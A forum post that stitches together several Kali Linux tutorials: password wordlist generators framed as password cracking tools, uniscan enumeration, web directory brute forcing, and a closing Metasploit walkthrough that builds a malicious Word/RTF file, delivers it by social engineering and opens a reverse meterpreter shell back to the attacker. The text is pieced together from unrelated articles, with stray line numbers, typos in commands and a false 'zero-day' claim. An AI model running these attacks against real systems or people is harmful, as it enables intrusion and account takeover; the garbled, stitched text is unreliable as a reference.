05-02-2020, 11:48 AM
| 0 | 0 | ||
Table of Content
- Dictionary attack
- Crunch
- Cewl
- Cupp
- Pydictor
- Dymerge
Crunch
The first is Crunch. The best thing about crunch is you can use it both offline and online. It generates wordlist according to your requirements. You can give the maximum and minimum length of the password and also provide it with a character-set which you want it to use while creating your dictionary. And then crunch will create your dictionary while keeping your requirements at its priority. Hence, a dictionary will be created with all the possible combinations.
Now let’s see how to use it. Observe its syntax first:
crunch <min> <max> <character-set> -t <pattern> -o <path>
crunch – crunch is the keyword which notifies the system to use this tool.
<min> – here you specify the minimum length characters you want.
<max> – here you specify the maximum length of characters.
<character-set> – here you specify the characters you want it to use while creating the dictionary.
-t <pattern>- this is optional but here you can specify the pattern in with you want your character-set to be.
-o <path> – here you give the path where you want your dictionary file to be saved.
For instance, open the terminal of kali and type:
crunch 3 4 ignite –o /root/Desktop/dict.txt
1
crunch 3 4 ignite –o /root/Desktop/dict.txt
Now the above command will create a dictionary with the possible combinations from the word ignite which will length from 3 to 4 characters. The file will be saved in text form on the Desktop. Similar is shown in the image below:
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Jhw0c47yrFo/WRdHb9NU2VI/AAAAAAAAP_s/ffq-O9gjT6sviyArK_cx6AjRR36zwnEAgCLcB/s1600/1.png?w=687&ssl=1)
Let’s now read the dict.txt file and for that type:
cat dict.txt
1
cat dict.txt
All the words will be displayed in the following manner:
For more detail read the full article from here:
[To see content please register here]
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-RZs0-VCOq20/WRdHdcIjVsI/AAAAAAAAQAA/bRFoCMOk9oI0mkbGeFt5m-vSqY5kheFJwCEw/s1600/2.png?w=687&ssl=1)
Cewl
Next way is by using Cewl. Now Cewl works somewhat like John The Ripper and is written in ruby. When targeting people of the corporate sector or the business world; this is the tool for you. As you all know it is in the human psyche to use the words significant to them and which occur in their day to day life. Cewl works on the URL you provide it. It will take that URL and crawl its way to the depth of 2 links (by default, you can increase or decrease the depth too) and will search every word which has the possibility of being a password. With all these words it will generate a word list for you to use as your dictionary in a dictionary attack. Let’s observe it syntax:
- cewl <url> -d<depth> -w<path>
- Cewl – indicated the tool which is being used
- <url> – here give the URL that you want to use as a foundation of your dictionary.
- -d<depth> – here, give the number of links you want it to go through while creating your dictionary.
- -w<path> – here, give the path where you want to store all the possible passwords.
- For example in the terminal of kali type :
[To see content please register here]
-d 2 -w /root/Desktop/dict.txt1
cewl
[To see content please register here]
-d 2 -w /root/Desktop/dict.txtThe above command will create a dictionary file using the word from the URL.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-nFyl4DjeNGc/WRdHdpKUx2I/AAAAAAAAQAI/-igWurQ2cF850J4lZM_6HvRSm1Zcj745wCEw/s1600/3.png?w=687&ssl=1){kind=small}
Let’s look the dictionary file it just created and for that type:
cat dict.txt
All the words will be displayed in the following manner:
For more detail read the full article from here:
[To see content please register here]
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ORje_0xpGSU/WRdHd86mhVI/AAAAAAAAQAM/5gtVsrO28Lo3rvmF6OGQ9EhR0xetuJJHgCEw/s1600/4.png?w=687&ssl=1)
Cupp
Our next way is using a third party tool i.e. cup. Previous tools were pre-installed but you will have to install this one on your own. To install it please type:
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-qbvLN-ThAV0/WRdHeKGpfhI/AAAAAAAAQAQ/OxJc7Yc_A3YXVPpcMOeMzmt2qVenUya9ACEw/s1600/5.png?w=687&ssl=1)
CUPP is developed in python and makes very personalized tool when it comes to password cracking. Studies show that while setting up the password, humans show a similar pattern such as they tend to make password personalize by adding their date of birth, anniversary date, pet’s name, etc. and CUPP focuses on this weakness and helps to crack password effectively. Before creating a wordlist, it will ask you the required information about your target. And will create the wordlist as per the information. Now, let’s study how it works set-by-step. Initiate cupp first by typing:
./cupp.py -i
1
./cupp.py -i
Once initiated it will ask you the information about your target as shown in the image:
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-glyr-if9zAo/WRdHeKc04DI/AAAAAAAAQAU/nrq3VLc8Yz4l61gQm9xp3_AHM2I0W_q4QCEw/s1600/6.png?w=687&ssl=1)
Give the required information and your wordlist will be generated as follows:
For more detail read the full article from here:
[To see content please register here]
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-QDcYXBjgI44/WRdHepg8wnI/AAAAAAAAQAY/8BtoEjK3jpASxU5aPRWFz8b_tUU59_U-wCEw/s1600/7.png?w=687&ssl=1)
Pydictor
Next up tool is Pydictor. This is a special tool as it is the only tool that creates the wordlist both in normal words and in base64 encryption. So if someone is smart enough to keep a safe password this tool will help you with it. Pydictor is written in python. There is two method to crack the password using this tool one creates a normal wordlist the other creates wordlist in base64 form. We will try both methods. But first things first, this is a third party tool so we will have to install it and for it please type :
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-wjYOYQrzBWo/WRdHeielDoI/AAAAAAAAQAk/_7MTmTKqbOEyeMtPjrVbb80JzmTeUfy9gCEw/s1600/8.png?w=687&ssl=1)
Once the tool is installed and ready to use, give it instructions on bases of what you want it to generate the wordlist using. Understand the syntax first:
./pydictor.py –len <min> <max> -base d –o <path>
1
./pydictor.py –len <min> <max> -base d –o <path>
- ./pydictor.py – initiates the tool
- –len – indicates the length of characters
- <min> – here, give the minimum length of characters
- <max> – here, give a maximum length of characters
- -o – indicates the path
- <path> – here, give the path where you want your wordlist to be saved
./pydictor.py --len 5 5 --base d –o /root/Desktop/dict.txt
1
./pydictor.py --len 5 5 --base d –o /root/Desktop/dict.txt
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-b6HqTvxCt-s/WRdHewcwqTI/AAAAAAAAQAk/hXIiaULkX9IyJqGku80YoRHfmz2mK3mgQCEw/s1600/9.png?w=687&ssl=1)
Let’s read the file created to have a look at the words that it has generated. And for that type:
cat dict.txt/BASE_5_5_d_071743.txt
1
cat dict.txt/BASE_5_5_d_071743.txt
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-32MlIHYaDO8/WRdHbz9GfBI/AAAAAAAAQAk/RP-CV--NUWoab_bhI4JWSd7lOVc1RbLLgCEw/s1600/10.png?w=687&ssl=1)
The other method using a similar tool gives us a password in base64 encoding. Let’s study the syntax first:
./pydictor.py –len <min> <max> -base d --encode <encoding type> –o <path>
1
./pydictor.py –len <min> <max> -base d --encode <encoding type> –o <path>
- ./pydictor.py – initiates the tool
- –len – indicates the length of characters
- <min> – here, give the minimum length of characters
- <max> – here, give a maximum length of characters
- –encode – indicated the type of encryption/encoding
- <encoding type> – here, give the type of encoding you want
- -o – indicates the path
- <path> – here, give the path where you want your wordlist to be saved
./pydictor.py --len 5 5 -base d --encode b64 –o /root/Desktop/dict.txt
1
./pydictor.py --len 5 5 -base d --encode b64 –o /root/Desktop/dict.txt
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-p3kyV7INCwk/WRdHbyULklI/AAAAAAAAQAk/GHHSVXFGsvE_Yda5_taQ_e5g7dykD5lTwCEw/s1600/11.png?w=687&ssl=1)
The above command will generate wordlist in base64 let’s have a look at it:
cat dict.txt/BASE_5_5_d_070433.txt
1
cat dict.txt/BASE_5_5_d_070433.txt
For more detail read the full article from here:
[To see content please register here]
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-f_XLq511G9c/WRdHc90OApI/AAAAAAAAQAk/ZnBWbPbaITk13oc_304eKzryHNv1PKvrwCEw/s1600/12.png?w=687&ssl=1)
Dymerge
The last and next up tool is Dymerge. Dymerge is an interesting and powerful tool made in python. Basically what dymerge does is takes the previously made multiple dictionaries and merges them into a single one, so all the dictionaries can you use in one go while you sit back and relax. You can merge any number of dictionaries either default ones or custom made. This is again a third party tool so let’s install it first:
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ot_OHZgOqqw/WRdHcoEZ-NI/AAAAAAAAQAk/QQMJiN5z4fMLCs_zRzE8GgWLewfRVuDtQCEw/s1600/13.png?w=687&ssl=1)
Let’s understand its syntax:
python dymerge.py <path> <path> -s –o <path>
- Python dymerge.py à initiates the tool
- <path> – here, give the path of the first dictionary you want to merge
- <path> – here, give the path of the second dictionary you want to merge
- -o – indicates the path where the resulted wordlist will be saved
- <path> – here, give the path where the final wordlist list will be saved
python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt –s –o /root/Desktop/dict.txt
1
python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt –s –o /root/Desktop/dict.txt
Here, I have taken two wordlists (you can take more also), where one contains numbers and other contains alphabets and merges them into one so you can use multiple dictionaries at the same time.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-HBnW8sPEUl0/WRdHcs9lSRI/AAAAAAAAQAk/kapCCcLSPgAoZ2H4854TeuzClKaO4xZ7gCEw/s1600/14.png?w=687&ssl=1)
Let’s have a look at the dictionary that it has created:
cat dict-1.txt
1
cat dict-1.txt
For more detail read the full article from here:
[To see content please register here]
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-if3I3_7Ma1U/WRdHdYo8amI/AAAAAAAAQAk/zmm5gi65FkkOvWty_JgMCJcV2yMbiH9xgCEw/s1600/15.png?w=687&ssl=1)
These are the five powerful and efficient ways to password cracking. Enjoy and explore these fo0r both hacking and recovering passwords. Have fun!
Through this article, we are trying to elaborate the word Enumeration using Kali Linux tool UNISCAN.
Uniscan is a simple Remote File Include, Local File Include, and Remote Command Execution vulnerability scanner as well as work as enumerating tool in order to gather information like open ports and protocol related to target and investigate it against any vulnerability.
Let’s start!!!
Open the terminal and type following command using –j option for server fingerprints
uniscan -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -j
1
uniscan -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -j
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-c6MPaVbYjrg/WRXVWSFrYuI/AAAAAAAAP-4/qsi8AXtCf9gwRBzw9RLFn6mmahG3MlHAgCLcB/s1600/1.png?w=687&ssl=1)
It will start enumeration from PING by sending ICMP packets to the targeted server and establish the connection.
Further, it will use TRACEROUTE to show the path of a packet of information taken from source to destination and list all the routers it travels through or fails to and is discarded. In actually, it will inform you how long each ‘hop’ from the router to router takes.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Jig5TSP6RIc/WRXVW_Ug7EI/AAAAAAAAP_A/3SXsk_sPgq81YCFevLjwLDN0oLvLTzrbwCEw/s1600/2.png?w=687&ssl=1)
NSLOOKUP is a program to query Internet domain name servers (DNS). NSLOOKUP or Reverse DNS (rDNS) is a method of resolving an IP address into a domain name
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-OXJVePhurVU/WRXVWzRkfVI/AAAAAAAAP-8/bC1SkEPn1FQXQrK5MMg0q4hEOTilnimlACEw/s1600/3.png?w=687&ssl=1)
Uniscan made use of NMAP for aggressive scan against the targeted server to identify open ports and protocols services hence from the screenshot you can observe the result. It also enumerates the target using NMAP NSE script to identify the vulnerability and details of running services.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-I6GjNICcTvo/WRXVXb_rAPI/AAAAAAAAP_E/ZYQTMzwtY_4H_CCf4mcCBGtdjhogHLYWwCEw/s1600/4.png?w=687&ssl=1)
Now type the following command for dynamic scan against the targeted server using –d option.
uniscan -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -d
1
uniscan -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -d
Now it will load the selected plug-in for fetching more details related to the targeted server.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-vqcFIVisGKE/WRXVXhtXsPI/AAAAAAAAP_I/UUmNwpr1_Fst2TBfFFjura-tBwfzr694QCEw/s1600/5.png?w=687&ssl=1)
From given screenshot, you can observe the result where it came up with an email id moreover loaded further plug-in for scanning vulnerability like SQL injection, remote or local file inclusion and XSS.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-JUdpfcwGBpc/WRXVXg3iGrI/AAAAAAAAP_M/74-SJcEbrVAoITsGWy2yOHyPwadDJbT7wCEw/s1600/6.png?w=687&ssl=1)
From given below screenshot you can see it has used blind SQL injection and return a link of the targeted web pages. Similarly, it will test for XSS and remote or local file inclusion vulnerability.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Ag5bhVfsRIE/WRXVX5nUV5I/AAAAAAAAP_Q/9Mpf9V38y3Yr5FMGHoSZFoAN4Fv30GmVgCEw/s1600/7.png?w=687&ssl=1)
Now type next command using –q option to enable directory test in targeted server
uniscan –u
[To see content please register here]
–q1
uniscan –u
[To see content please register here]
–qForm scanning result you can read the fetched directories.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-1hhSdVVXIrw/WRXVYBpxzKI/AAAAAAAAP_U/HO_8TQBvMEACevZ_0tOUVgT0bRzalEXSQCEw/s1600/8.png?w=687&ssl=1)
Last but not least use –g option for web fingerprints with the following command
uniscan –u
[To see content please register here]
–g1
uniscan –u
[To see content please register here]
–gHere we have come across available http option GET, HEAD, POST, OPTION, and TRACE which might help in verb tampering.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-qSCRZzwus6E/WRXVYBjtrCI/AAAAAAAAP_Y/-I_Kbqy_VTY3t41wbjkVjJnVzgZKVPT5ACEw/s1600/9.png?w=687&ssl=1)
It will try to find out web service and error information and type of error as shown in the given image.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-ynZ91HQtz3M/WRXVWC-n3-I/AAAAAAAAP_c/t4Q3GVf4DasgIHh7phITN1YrPRiJTwmlwCEw/s1600/10.png?w=687&ssl=1)
Here this tool inserts a string in html in order to grab banner moreover we have come across the credential of the web server and from the given screenshot you can read login msfadmin: msfadmin
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-A8XNg7T3DU4/WRXVWKDKT1I/AAAAAAAAP_c/TPSKmw92uiIcVShMzNJ3fIpnFHo6kIoAwCEw/s1600/11.png?w=687&ssl=1)
In this article, we have a focus towards directory brute force attack using Kali Linux tool and try to find hidden files and directories inside a web server for penetration testing.
Table of Content
- What is Path Traversal or Directory Traversal?
- DIRB
- Dirbuster
- Wfuzz
- Metasploit
- Dirserach
A path traversal attack is also known as directory traversal aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (…/)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. For more information visit owasp.org
Let’s Start!!!
DIRB
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response. DIRB main purpose is to help in professional web application auditing.
The tool “Dirb” is in-built in Kali Linux, therefore, Open the terminal and type following command to start brute force directory attack.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
Hence you can see read the fetched directories and file in the given screenshot.
To know more, read the full article from here:
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-3nCA-j9tgLk/WRSHi23dZlI/AAAAAAAAP-U/HyhfT3gQuE8XCCagP4a69i34thXcxJdbQCLcB/s1600/1.png?w=687&ssl=1)
DirBuster
DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. DirBuster comes with a total of 9 different lists; this makes DirBuster extremely effective at finding those hidden files and directories.
Similarly, open the terminal and type Dirbuster, then enter the target URL as shown in below image and browse /usr/share/dirbuster/wordlis/ directory-list-2-3-medium.txt for brute force attack.
Select option dir to start with /dvwa, once you have configured the tool for attack click on start.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-1CKS7aaNODk/WRSHi1KclnI/AAAAAAAAP-M/TzORdatTpoMxzB0G7xVPvlSRdLVWjqB2ACEw/s1600/2.png?w=687&ssl=1)
This will start the brute force attack and dumps all file and directory present inside web server as shown in the given screenshot.
To know more, read the full article from here:
[To see content please register here]
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-KLJ-rIyE_Vw/WRSHiy-m2FI/AAAAAAAAP-Q/kJEeHEIageks6jefCZSqawbQrcAR_85QQCEw/s1600/3.png?w=687&ssl=1)
Wfuzz
Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP, etc), bruteforce Forms parameters (User/Password), Fuzzing, etc.
wfuzz -c -W /usr/share/wfuzz/wordlist/dir/common.txt --hc 400,404,403
[To see content please register here]
1
wfuzz -c -W /usr/share/wfuzz/wordlist/dir/common.txt --hc 400,404,403
[To see content please register here]
Here option –c is used for output with color; -W for wordlist; –hc for hiding responses with the specified code/lines/words/chars. It is also in-built in your Kali Linux.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-tAeIC3HXDxQ/WRSHjRJcU_I/AAAAAAAAP-Y/lrm8aCeM15E9lA0zNjFuikYUZEescJdtQCEw/s1600/4.png?w=687&ssl=1)
Metasploit
HTTP Directory Scanner
This module identifies the existence of interesting directories in a given directory path.
use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) >set dictionary /usr/share/wordlists/dirb/common.txt
msf auxiliary(dir_scanner) >set rhosts 192.168.1.5
msf auxiliary(dir_scanner) > set path /dvwa
msf auxiliary(dir_scanner) >exploit
1
2
3
4
5
use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) >set dictionary /usr/share/wordlists/dirb/common.txt
msf auxiliary(dir_scanner) >set rhosts 192.168.1.5
msf auxiliary(dir_scanner) > set path /dvwa
msf auxiliary(dir_scanner) >exploit
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-aIYd9Zbcx7s/WRSHj26EZOI/AAAAAAAAP-c/amrG_hauC8YvruSewsabh3DNh4CuNM92wCEw/s1600/5.png?w=687&ssl=1)
Dirsearch
Dirsearch is a simple command line tool designed to brute force directories and files in websites. This tool is available at GitHub you can download it from
[To see content please register here]
and after installation in your Kali Linux type following to start dirsearch../dirsearch.py –u
[To see content please register here]
-e php -f -x 400,403,4041
./dirsearch.py –u
[To see content please register here]
-e php -f -x 400,403,404Here option –e is use for generating one entry for php extension; -x hide responses with the specified code/lines/words/chars.
From the given screenshot, you can read php file of the targeted web server.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-PoNDFviCxqY/WRSHj01WQxI/AAAAAAAAP-g/Ch-MKTwurVU8N7CCdoe0ywpd_PV0cm3YgCEw/s1600/6.png?w=687&ssl=1)
For Kali Linux users we had performed this attack through Metasploit without using any python script which generates .rtf file for the attack, thus the user only needs to update their Kali Linux and load Metasploit framework to start this attack. This is a zero-day exploit that has excellent rating against Ms-office vulnerability which can be very easily used to shoot any targeted windows system.
Attacker: Kali Linux
Target: MS Office
Let’s breach!!
msfconsole
1
msfconsole
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-2N1P81awVg8/WRCsVHhOBGI/AAAAAAAAP98/6XdrytvTF3E5-1o7qxZzy4I1hDqeyOO5ACLcB/s1600/1.png?w=687&ssl=1)
This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.
Use exploit/windows/fileformat/office_word_hta
Msf > exploit (office_word_hta) >set srvhost 192.168.1.8
Msf > exploit (office_word_hta) >set payload windows/meterpreter/revrese_tcp
Msf > exploit (office_word_hta) >set filename sale.doc
Msf > exploit (office_word_hta) >set lhost 192.168.1.8
Msf > exploit (office_word_hta) >exploit
1
2
3
4
5
6
Use exploit/windows/fileformat/office_word_hta
Msf > exploit (office_word_hta) >set srvhost 192.168.1.8
Msf > exploit (office_word_hta) >set payload windows/meterpreter/revrese_tcp
Msf > exploit (office_word_hta) >set filename sale.doc
Msf > exploit (office_word_hta) >set lhost 192.168.1.8
Msf > exploit (office_word_hta) >exploit
This module will automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc moreover it will generate a link and that link must be share to target using social engineering method.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-MPE-_jHFrsM/WRCsVPoX4QI/AAAAAAAAP94/vbAsSHUOD5wHwGSf0v71I9Wxa2OEsTTGACEw/s1600/2.png?w=687&ssl=1)
When the user will open that link and make double-click (OLE event) on .hta file, the attacker will receive meterpreter session in the Metasploit framework.
meterpreter > sysinfo
1
meterpreter > sysinfo
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-oGKRVyy8NwE/WRCsVGGwcgI/AAAAAAAAP90/Dwkk_lMbCmAcaMS1uvCcA3Toeg8yxVAygCEw/s1600/3.png?w=687&ssl=1)
